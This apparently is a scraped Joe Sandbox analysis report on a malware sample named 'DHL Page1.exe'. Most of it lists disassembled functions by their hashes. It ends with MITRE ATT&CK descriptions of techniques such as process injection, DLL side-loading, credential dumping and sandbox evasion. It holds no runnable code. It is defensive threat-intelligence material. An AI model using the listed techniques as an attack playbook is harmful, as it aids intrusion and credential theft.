Opcode Fuzzy Hash: a8a4f82698a444c770c999ea10284fb5a64c8d85dee36fec10eae6bdd65fb895
Instruction Fuzzy Hash: 1D31BC34B002018BEB199B7094147AE7BA2BF88795F64582DC402EB3A2DF38C842CB94

Function 3A562338 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b4fae89d7f791c5d55737c274e27fa9666bea4358640ef3d29b59a962c039e2
Instruction ID: 5f22749af48156f88db6dae40f7a41768f3d5a2543f5025bec591311f5e530ec
Opcode Fuzzy Hash: 1b4fae89d7f791c5d55737c274e27fa9666bea4358640ef3d29b59a962c039e2
Instruction Fuzzy Hash: AA21A034B002018BEB0D9B71D41476E7BA2BF88755F655929D402EB3A2DF39CC42CBD5

Function 3A5660D8 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af4c752094e9af26643eefef6a9ec66b831cfbc1148765e64d34ec852018117b
Instruction ID: 9ddc91fb657647456a1c4a53cad33cad6c28f2b1c2c75c55b66c0305baead644
Opcode Fuzzy Hash: af4c752094e9af26643eefef6a9ec66b831cfbc1148765e64d34ec852018117b
Instruction Fuzzy Hash: BF218D75F112159FEB04DFB8D840BEEBBF2AB88350F148029E904E73A1DB35D8428B90

Function 3A5660E8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1d29489a853bc522f4897688df31ab2a608aebda33f24b34faafc94e86d310c
Instruction ID: c26ab7fe98337a44af917b5e73ec7234eeeca9fd6872cd0f31bdbfc5ecf325b5
Opcode Fuzzy Hash: f1d29489a853bc522f4897688df31ab2a608aebda33f24b34faafc94e86d310c
Instruction Fuzzy Hash: 61217A79E022159FEB04DFA9D980A9EB7F2EB48350F109029E905E7361EB75D8018B90

Function 3A565EB1 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0535a31abd180d7678d8ae569d166415366b77e877bacda69a45997535d928d
Instruction ID: 1242f5b6d79125ed5e9c3475148186261c398c406e4bd9110c9202dc023ab555
Opcode Fuzzy Hash: e0535a31abd180d7678d8ae569d166415366b77e877bacda69a45997535d928d
Instruction Fuzzy Hash: 0F3117B5E01219DFDB00CF99D884ADEFBB4FB48314F54826AE918B7210C734A955CFA1

Function 3A568CA0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e4f32fe81a5e3a986ea165a552edc7a17949bab4958209375476f5b9a8884ac
Instruction ID: d2bc08356591d0ed0ab6f70d9bdf1a1dbd7758e9b53a29fcefa2f8c7204ed82e
Opcode Fuzzy Hash: 9e4f32fe81a5e3a986ea165a552edc7a17949bab4958209375476f5b9a8884ac
Instruction Fuzzy Hash: F421C234B011199FEB44CA68D46069DBBF3EB88354F189429E406EB351D730DD42CB94

Function 3A563DF0 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f46d1da657d015883ecabea0710b0443d05107cf184d489a08fd35185d262fee
Instruction ID: 5373f671e9888a142250d946ed4f3c5ac2cae6ce4fa4ed4f99ff4dcbe1b86c0a
Opcode Fuzzy Hash: f46d1da657d015883ecabea0710b0443d05107cf184d489a08fd35185d262fee
Instruction Fuzzy Hash: 6F11C176F001291BFB60CA5ACC80B6FA29AE7D56B8F55553AE909DB2A0D630CC4583E0

Function 0044D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127054832410.000000000044D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0044D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_44d000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 013a258b8aa0df42ec8e912c0b625251448da5385a1b5d63a80141a41e0ababc
Instruction ID: c33edd85dfea45844f969b1bce6099910583038b4bb7dfa3df0bfd3d1301c0ad
Opcode Fuzzy Hash: 013a258b8aa0df42ec8e912c0b625251448da5385a1b5d63a80141a41e0ababc
Instruction Fuzzy Hash: 3921F571A04304EFEB14CF24D8C4B16BBA1FB88318F24C56EE9494B342C77AD847CA66

Function 3A5642D0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e88ab1e0a1a73d5acd08c1526ae6f906ed6e72c1ab178de8540b8f2a780fab7
Instruction ID: 681cf08994ca237f19affeac88817c53d8f7bf6d36650de14277f39ba37da75c
Opcode Fuzzy Hash: 7e88ab1e0a1a73d5acd08c1526ae6f906ed6e72c1ab178de8540b8f2a780fab7
Instruction Fuzzy Hash: CF21B5756017049FD724DF29D590A6BBBF6EF88310B04CA2DE48A8BB50DB30E845CB90

Function 3A56568A Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc2112f77c27c5b0d98ac3544b0acf0b0d9f41e343ac43d9c9c0f74bcec80133
Instruction ID: 05ac2c0269bce146480f8b541ac2bc24c75bc1642c4da268e74de1d1e0efe252
Opcode Fuzzy Hash: dc2112f77c27c5b0d98ac3544b0acf0b0d9f41e343ac43d9c9c0f74bcec80133
Instruction Fuzzy Hash: 0B21C071E012189BCB25DF78D8506EEFBF5EB89344F5494BED006EB215EA318941CBC0

Function 3A562EB0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f86d4f46c4282482652b3d6821662e9734fda0dd232cc2d86a9c7e7d5f4abdb1
Instruction ID: 2f6d9f10224bc5d22dab25cc55d3fccdd6d12bb2ace6001b4d327fc92c2b7e0f
Opcode Fuzzy Hash: f86d4f46c4282482652b3d6821662e9734fda0dd232cc2d86a9c7e7d5f4abdb1
Instruction Fuzzy Hash: 312124B5D012099FCB50CF99D884BDEFBF4FF48324F15816AE808AB210D374AA44CBA4

Function 3A5661F8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d69f135a747afecfeca4972e7e4079af8a902225f552135e97fd49609c061aee
Instruction ID: f52bc318a6cdf00049552b0e7b77f32b317de2d4c0ba72a7bd65a5b02893da8c
Opcode Fuzzy Hash: d69f135a747afecfeca4972e7e4079af8a902225f552135e97fd49609c061aee
Instruction Fuzzy Hash: A311A135B051298BDF5896B8C8106AFB3AAEBC8350F048539D806EB354DE75DC028BE0

Function 3A566431 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98378b9555eb9497fd8ac5353e9d487ee064e85fb6bc51888077b909aba1c7a5
Instruction ID: 9fb15793e5821b030b75abf9007e5d6ef84dd1b3626fd070eb39db2d0148df5d
Opcode Fuzzy Hash: 98378b9555eb9497fd8ac5353e9d487ee064e85fb6bc51888077b909aba1c7a5
Instruction Fuzzy Hash: 49019E347055504FE7599A6C84A076FBBEACBCA755F18883EE10AC7762E92ACC038391

Function 3A562FF0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8773f0af5dd9940bcf9a32577f5456b58d873b26989ef7f54b59f21a422a9bce
Instruction ID: abb95c7e2fdeab4f41e45b4b64f595e442c04881abda3eec8590a6dafd77db70
Opcode Fuzzy Hash: 8773f0af5dd9940bcf9a32577f5456b58d873b26989ef7f54b59f21a422a9bce
Instruction Fuzzy Hash: 5F2100B1D05219AFDB00CF9AD884ADEFBB8FB48314F50812AE918B7300C374A954CBE5

Function 3A56339A Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8219c1cb17c1be1bb5d05944ea190e832696b2cd9837fe15e64195f65230e5d
Instruction ID: 34b701ee9e047fc0c16920397b3edc6984771438a85444868108ed206e039dbe
Opcode Fuzzy Hash: a8219c1cb17c1be1bb5d05944ea190e832696b2cd9837fe15e64195f65230e5d
Instruction Fuzzy Hash: DB218672800249DFCB00CF99C844BEEBFF4EF48320F14842AE558A7210C339A591CFA0

Function 3A562988 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6108eb4236ea7d0aa1174d984e6fe6150cf25c19d5c660ca1a43441c9689d1d
Instruction ID: a40d431ec03d85cd108fb5ba76b3803081eaf52a7a26b6d79e93d76fdc7a614c
Opcode Fuzzy Hash: c6108eb4236ea7d0aa1174d984e6fe6150cf25c19d5c660ca1a43441c9689d1d
Instruction Fuzzy Hash: 051123B6800349DFDB10CF99D844BEEBFF4EB48324F14841AE958A7210C739A950DFA5

Function 3A56A018 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6930a7dc57787b8a7d08fc07a9341a63f9e08521dd5707db58203c829135f9a5
Instruction ID: 34303f193570a81a5fba746b676d2df3598cc08b484f0a005c115243c7fccaf7
Opcode Fuzzy Hash: 6930a7dc57787b8a7d08fc07a9341a63f9e08521dd5707db58203c829135f9a5
Instruction Fuzzy Hash: 7701F535B042189FEB258EA4C8443EEBBB5FF84364F551479DA01F7261CA31D886C7C0

Function 0044D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127054832410.000000000044D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0044D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_44d000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0805171a530670e9f1383d81f7b365e8c2d02a00c14a36601d6d66ec15f4596
Instruction ID: 1b772d1cd8a4c37b524659e2e01f95739e5576b5c3d512c162321b7b68e8f892
Opcode Fuzzy Hash: e0805171a530670e9f1383d81f7b365e8c2d02a00c14a36601d6d66ec15f4596
Instruction Fuzzy Hash: E611BE75904284CFDB15CF14C5C4B16BBA1FB48314F24C6AED8494B352C33AD84ACF52

Function 3A566440 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b48d2a7840b9def014cfc2d80802e0745c2e9c15e64440dbd7edeed03aba96a
Instruction ID: 79ab4a95941a3fccc8c71319eda32f2a890ea0a52300600b7f2cd42c57f3c2b8
Opcode Fuzzy Hash: 5b48d2a7840b9def014cfc2d80802e0745c2e9c15e64440dbd7edeed03aba96a
Instruction Fuzzy Hash: 3E01A9347010104BE758D96D84A0B2FB7DACBC9799F28883AE50EC77A1FD2ADC028395

Function 3A5661E7 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc4e538bf82dbc41e04ca357448d1f35f8fa95a2ce44ef0d0357ccf7be615597
Instruction ID: a7f104db2e1608b58c8a732b43fd0bfe182e102a46469ec72f537e9a8137c8a3
Opcode Fuzzy Hash: dc4e538bf82dbc41e04ca357448d1f35f8fa95a2ce44ef0d0357ccf7be615597
Instruction Fuzzy Hash: 1001F736B050A94BEF499AB8CD107EFB7AB9FC8700F084039D54AE7690DE65CC0687D1

Function 3A5677BF Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 990844944d9334c01bb4faad19da3cc2661c231c0fab587b2c2cdc001dda907e
Instruction ID: 3fb65e9b64d793552d453c3be8d30ca6a27e52709f6ed94dfa233656a9b51e92
Opcode Fuzzy Hash: 990844944d9334c01bb4faad19da3cc2661c231c0fab587b2c2cdc001dda907e
Instruction Fuzzy Hash: C901B135D002499FCB218FA988816AEFFB0EF86214F1444BFC109D7161C2768952CBC0

Function 3A562475 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f47491031c7cba1e5609bd0284ae005b143b64bcc5724a78225dcd9eb5357c79
Instruction ID: 10ba60f699e893931eb7850f1c7e25e6c0dd171e8c4ced70c7ec72ff0a8bcb6f
Opcode Fuzzy Hash: f47491031c7cba1e5609bd0284ae005b143b64bcc5724a78225dcd9eb5357c79
Instruction Fuzzy Hash: CBF0AF35B002189FDB10CBA9D844BDEB7F1FF88326F1482A5E129B72D4C639D9158BA0

Function 3A563160 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64e01a5e414b0e557d5651d2e84ee672bf453d427dfbf85969796cf9b23f08e3
Instruction ID: c4d1a92a55d0c1c1e19c155243e414cb5d60fba18d024a7c37c3c60cb4f876fe
Opcode Fuzzy Hash: 64e01a5e414b0e557d5651d2e84ee672bf453d427dfbf85969796cf9b23f08e3
Instruction Fuzzy Hash: EAF0E23230021CAF8F099E98A8008AF7FABEBCC360B44402AF509C3350CA364C1297B1

Function 3A56E798 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e207c4fdaa7817331db9097ba8a0cc3132d10df0a0446b8dadcb2b6bc715759
Instruction ID: 7a775c17f5623ea50aa1dfef49e3487b34a93063ee534ac6328be6771a0b6dbd
Opcode Fuzzy Hash: 1e207c4fdaa7817331db9097ba8a0cc3132d10df0a0446b8dadcb2b6bc715759
Instruction Fuzzy Hash: 8DF0A736A1222897DB589565D8009DBB33AFB84754F104429ED00F7340DA31A805C7D0

Function 3A562570 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13cdec2ab24e8b4afe44cb77bdf91fa4f6f07f188b445225f2b189738d96bc6e
Instruction ID: 8a03cdf349ef9a5918a2f487a4e9f9a192f38bb1a145cbcf6e9739f65f26e6fb
Opcode Fuzzy Hash: 13cdec2ab24e8b4afe44cb77bdf91fa4f6f07f188b445225f2b189738d96bc6e
Instruction Fuzzy Hash: A1F0A0B1E002599FD754DEB888103EFBFF6AB99254F40847AD44AEB205E235C601CBC0

Function 3A562580 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3a560000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba7ec80cab7cf9c5e8529a578076009bcad23675058736065856c60ca0adee22
Instruction ID: 70462902042db218cb88e7287e863b9102b1706a57906622d8ee3ab1c0808700
Opcode Fuzzy Hash: ba7ec80cab7cf9c5e8529a578076009bcad23675058736065856c60ca0adee22
Instruction Fuzzy Hash: A4E04FB5E003199FDB54DEB99C1139F7BF8EB58254F408476D809EB200F634C6008BD1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL Page1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

